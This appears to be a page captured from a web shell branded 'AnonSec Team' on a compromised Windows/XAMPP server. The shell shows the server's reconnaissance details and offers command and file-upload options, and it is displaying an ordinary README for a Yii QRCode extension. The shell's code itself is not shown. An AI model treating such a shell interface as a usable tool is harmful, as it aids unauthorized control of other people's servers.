AnonSec Team
Server IP : 127.0.0.1  /  Your IP : 127.0.0.1
Web Server : Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.6.3
System : Windows NT WIN-R7LTCC7BPLI 6.3 build 9200 (Windows Server 2012 R2 Datacenter Edition) i586
User : GerbangSIPAD ( 0)
PHP Version : 5.6.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF
Directory (0777) :  C:/xampp5/htdocs/bhumie/protected/extensions/qrcode/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : C:/xampp5/htdocs/bhumie/protected/extensions/qrcode/README.md
## Yii QRCode
Original PHP QRCode is from [http://phpqrcode.sourceforge.net/](http://phpqrcode.sourceforge.net/) writed by deltalab@poczta.fm

I convert it to make it easier to use in Yii framework.
Hope useful to you.

## Requirements
* Yii 1.x 
* PHP 5.x

## Installation
* Place this extension in /protected/extensions/qrcode
* In main.php, add the following to 'components':

```php
'qrcode' => array(
    'class' => 'ext.qrcode.QRCode',
),
```

## Usage
examples

```php
#create text qrcode
Yii::app()->qrcode->create('test');
#create link qrcode
Yii::app()->qrcode->create('http://www.wanzhoumo.com');
#set qrcode size
Yii::app()->qrcode->setSize(6)->create('test');
```

## License
Modified BSD License <https://github.com/jianzhenchen/Yii-QRcode>

AnonSec - 2021